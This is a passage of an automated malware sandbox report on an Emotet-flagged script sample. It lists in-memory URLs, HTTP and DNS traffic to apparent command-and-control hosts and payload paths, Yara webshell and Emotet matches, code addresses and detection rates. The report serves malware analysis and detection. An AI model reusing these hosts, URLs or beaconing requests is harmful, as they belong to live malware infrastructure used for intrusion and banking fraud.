00000001.00000003.394296521.0000000004F4E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.390572551.0000000004D33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gomespontes.com.br/logs/pd/
                Source: wscript.exe, 00000001.00000003.397549848.000000000514E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.398347187.000000000515E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396362183.0000000005108000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397096568.0000000005128000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396772496.0000000005110000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397979888.0000000005155000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gomespontes.com.br/logs/pd/0
                Source: wscript.exe, 00000001.00000003.400124856.0000000001231000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gomespontes.com.br/logs/pd/vM
                Source: unknownHTTP traffic detected: POST /ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/ HTTP/1.1Connection: Keep-AliveContent-Length: 0Host: 182.162.143.56
                Source: unknownDNS traffic detected: queries for: penshorn.org
                Source: global trafficHTTP traffic detected: GET /admin/Ses8712iGR8du/ HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: penshorn.org
                Source: unknownHTTPS traffic detected: 203.26.41.131:443 -> 192.168.2.4:49685 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 182.162.143.56:443 -> 192.168.2.4:49689 version: TLS 1.2

                E-Banking Fraud

                barindex
                Yara detected Emotet
                Source: Yara matchFile source: 4.2.regsvr32.exe.bc0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.regsvr32.exe.bc0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.regsvr32.exe.dd0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.regsvr32.exe.dd0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.632533152.0000000000BC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.632618428.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.385011052.0000000000DD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: 00000001.00000002.404406526.0000000005194000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: webshell_asp_obfuscated date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
                Source: 00000001.00000002.404406526.0000000005194000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: WEBSHELL_asp_generic date = 2021-03-07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
                Source: 00000001.00000002.404361294.0000000005166000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: WEBSHELL_asp_generic date = 2021-03-07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
                Source: 00000001.00000003.389837714.0000000005222000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: WEBSHELL_asp_generic date = 2021-03-07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
                Source: 00000001.00000003.399230636.0000000005194000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: WEBSHELL_asp_generic date = 2021-03-07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
                Source: 00000001.00000003.401747344.0000000005166000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: WEBSHELL_asp_generic date = 2021-03-07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
                Source: 00000001.00000003.401867106.0000000005166000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: WEBSHELL_asp_generic date = 2021-03-07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
                Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\system32\VZzVLyswcgycmo\Jump to behavior
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800068183_2_0000000180006818
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000B8783_2_000000018000B878
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800071103_2_0000000180007110
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180008D283_2_0000000180008D28
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800145553_2_0000000180014555
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_009E00003_2_009E0000
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E1709C3_2_00E1709C
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E1A0003_2_00E1A000
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E0CC143_2_00E0CC14
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E07D6C3_2_00E07D6C
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E0263C3_2_00E0263C
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E08BC83_2_00E08BC8
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E18FC83_2_00E18FC8
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E120E03_2_00E120E0
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E03CF43_2_00E03CF4
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E090F83_2_00E090F8
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E048FC3_2_00E048FC
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E0F8C43_2_00E0F8C4
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E15CC43_2_00E15CC4
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E080CC3_2_00E080CC
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E108CC3_2_00E108CC
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E014D43_2_00E014D4
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E13CD43_2_00E13CD4
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E018DC3_2_00E018DC
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E098AC3_2_00E098AC
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E1A8B03_2_00E1A8B0
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E0DCB83_2_00E0DCB8
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E294BC3_2_00E294BC
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E158803_2_00E15880
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E04C843_2_00E04C84
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E1CC843_2_00E1CC84
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E0AC943_2_00E0AC94
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E1B4603_2_00E1B460
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E16C703_2_00E16C70
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E0D4743_2_00E0D474
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E02C783_2_00E02C78
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E0C0783_2_00E0C078
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E0B07C3_2_00E0B07C
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E078403_2_00E07840
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E1C44C3_2_00E1C44C
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E254503_2_00E25450
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E1C0583_2_00E1C058
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E110303_2_00E11030
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E1EC303_2_00E1EC30
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E0B83C3_2_00E0B83C
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E010003_2_00E01000
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E094083_2_00E09408
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E07C083_2_00E07C08
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E2181C3_2_00E2181C
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E1D5F03_2_00E1D5F0
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E115C83_2_00E115C8
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E1BDA03_2_00E1BDA0
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E095BC3_2_00E095BC
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E14D203_2_00E14D20
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E119243_2_00E11924
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E1AD283_2_00E1AD28
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E075303_2_00E07530
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E1B1303_2_00E1B130
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E061383_2_00E06138
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E285003_2_00E28500
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E1610C3_2_00E1610C
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E299103_2_00E29910
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E175183_2_00E17518
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E092F03_2_00E092F0
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E1EAC03_2_00E1EAC0
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E0D6CC3_2_00E0D6CC
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E196D43_2_00E196D4
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E0AAB83_2_00E0AAB8
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E04EB83_2_00E04EB8
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E03ABC3_2_00E03ABC
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E1A6BC3_2_00E1A6BC
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E08A8C3_2_00E08A8C
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E24E8C3_2_00E24E8C
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E0BE903_2_00E0BE90
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E14A903_2_00E14A90
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E0A6603_2_00E0A660
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E10A703_2_00E10A70
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E032743_2_00E03274
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E1A2443_2_00E1A244
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E0B2583_2_00E0B258
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E0F65C3_2_00E0F65C
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E0BA2C3_2_00E0BA2C
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E18A2C3_2_00E18A2C
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E10E2C3_2_00E10E2C
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E1662C3_2_00E1662C
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E15A003_2_00E15A00
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E28A003_2_00E28A00
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E18E083_2_00E18E08
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E03E0C3_2_00E03E0C
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E1020C3_2_00E1020C
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E042143_2_00E04214
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E0461C3_2_00E0461C
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E227EC3_2_00E227EC
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E0A7F03_2_00E0A7F0
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E197CC3_2_00E197CC
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E13FD03_2_00E13FD0
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E02FD43_2_00E02FD4
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E033D43_2_00E033D4
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E0DBA03_2_00E0DBA0
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E08FB03_2_00E08FB0
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E0FFB83_2_00E0FFB8
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E18BB83_2_00E18BB8
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E153843_2_00E15384
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E01B943_2_00E01B94
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E1D7703_2_00E1D770
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E1CF703_2_00E1CF70
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E083783_2_00E08378
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E0F77C3_2_00E0F77C
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E1E7503_2_00E1E750
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E047583_2_00E04758
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E0975C3_2_00E0975C
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E0D33C3_2_00E0D33C
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E1E3103_2_00E1E310
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E0EF143_2_00E0EF14
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E13B143_2_00E13B14
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E14F183_2_00E14F18
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00BB00004_2_00BB0000
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E108CC4_2_00E108CC
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E0640A4_2_00E0640A
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E0CC144_2_00E0CC14
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E07D6C4_2_00E07D6C
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E176A84_2_00E176A8
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E06E424_2_00E06E42
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E206184_2_00E20618
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E063F44_2_00E063F4
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E08BC84_2_00E08BC8
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E18FC84_2_00E18FC8
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E13FD04_2_00E13FD0
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E273A44_2_00E273A4
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E09B794_2_00E09B79
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E120E04_2_00E120E0
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E03CF44_2_00E03CF4
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E090F84_2_00E090F8
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E048FC4_2_00E048FC
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E0F8C44_2_00E0F8C4
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E15CC44_2_00E15CC4
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E080CC4_2_00E080CC
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E014D44_2_00E014D4
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E13CD44_2_00E13CD4
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E21CD44_2_00E21CD4
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E018DC4_2_00E018DC
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E244A84_2_00E244A8
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E098AC4_2_00E098AC
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E1A8B04_2_00E1A8B0
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E0DCB84_2_00E0DCB8
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E294BC4_2_00E294BC
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E158804_2_00E15880
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E04C844_2_00E04C84
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E1CC844_2_00E1CC84
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E2488C4_2_00E2488C
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E0AC944_2_00E0AC94
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E214944_2_00E21494
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E1709C4_2_00E1709C
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E1B4604_2_00E1B460
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E258684_2_00E25868
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E16C704_2_00E16C70
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E0D4744_2_00E0D474
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E02C784_2_00E02C78
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E0C0784_2_00E0C078
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E0B07C4_2_00E0B07C
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E078404_2_00E07840
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E1C44C4_2_00E1C44C
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E254504_2_00E25450
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E1C0584_2_00E1C058
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E110304_2_00E11030
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E1EC304_2_00E1EC30
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E0B83C4_2_00E0B83C
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E010004_2_00E01000
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E1A0004_2_00E1A000
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E094084_2_00E09408
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E07C084_2_00E07C08
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E074104_2_00E07410
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E2181C4_2_00E2181C
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E1D5F04_2_00E1D5F0
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E115C84_2_00E115C8
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E1BDA04_2_00E1BDA0
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E095BC4_2_00E095BC
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E24D644_2_00E24D64
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E14D204_2_00E14D20
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E119244_2_00E11924
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E1AD284_2_00E1AD28
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E1B1304_2_00E1B130
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E061384_2_00E06138
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E285004_2_00E28500
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E221004_2_00E22100
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E1610C4_2_00E1610C
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E299104_2_00E29910
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E175184_2_00E17518
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E092F04_2_00E092F0
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E236FC4_2_00E236FC
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E1EAC04_2_00E1EAC0
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E0D6CC4_2_00E0D6CC
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E196D44_2_00E196D4
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E22AB04_2_00E22AB0
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E0AAB84_2_00E0AAB8
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E04EB84_2_00E04EB8
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E03ABC4_2_00E03ABC
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E1A6BC4_2_00E1A6BC
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E22E844_2_00E22E84
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E08A8C4_2_00E08A8C
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E24E8C4_2_00E24E8C
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E0BE904_2_00E0BE90
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E14A904_2_00E14A90
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E0A6604_2_00E0A660
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E10A704_2_00E10A70
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E032744_2_00E03274
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E1A2444_2_00E1A244
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E26E484_2_00E26E48
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E0B2584_2_00E0B258
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E0F65C4_2_00E0F65C
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E0BA2C4_2_00E0BA2C
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E18A2C4_2_00E18A2C
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E10E2C4_2_00E10E2C
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E1662C4_2_00E1662C
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E0263C4_2_00E0263C
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E15A004_2_00E15A00
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E28A004_2_00E28A00
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E18E084_2_00E18E08
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E03E0C4_2_00E03E0C
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E1020C4_2_00E1020C
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E042144_2_00E04214
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E0461C4_2_00E0461C
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E227EC4_2_00E227EC
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E0A7F04_2_00E0A7F0
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E1FFFC4_2_00E1FFFC
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E197CC4_2_00E197CC
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E02FD44_2_00E02FD4
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E033D44_2_00E033D4
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E0DBA04_2_00E0DBA0
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E247A84_2_00E247A8
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E08FB04_2_00E08FB0
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E0FFB84_2_00E0FFB8
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E18BB84_2_00E18BB8
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E153844_2_00E15384
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E01B944_2_00E01B94
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E28B684_2_00E28B68
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E1D7704_2_00E1D770
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E1CF704_2_00E1CF70
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E083784_2_00E08378
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E0F77C4_2_00E0F77C
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E1E7504_2_00E1E750
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E047584_2_00E04758
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E0975C4_2_00E0975C
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E0D33C4_2_00E0D33C
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E1E3104_2_00E1E310
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E283104_2_00E28310
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E0EF144_2_00E0EF14
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E13B144_2_00E13B14
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E14F184_2_00E14F18
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E25B1C4_2_00E25B1C
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180010C10 LdrFindResource_U,LdrAccessResource,NtAllocateVirtualMemory,3_2_0000000180010C10
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180010AC0 ExitProcess,RtlQueueApcWow64Thread,NtTestAlert,3_2_0000000180010AC0
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180010DB0 ZwOpenSymbolicLinkObject,ZwOpenSymbolicLinkObject,3_2_0000000180010DB0
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\radC86B9.tmp.dll 2F39C2879989DDD7F9ECF52B6232598E5595F8BF367846FF188C9DFBF1251253
                Source: OMICS.oneReversingLabs: Detection: 30%
                Source: OMICS.oneVirustotal: Detection: 40%
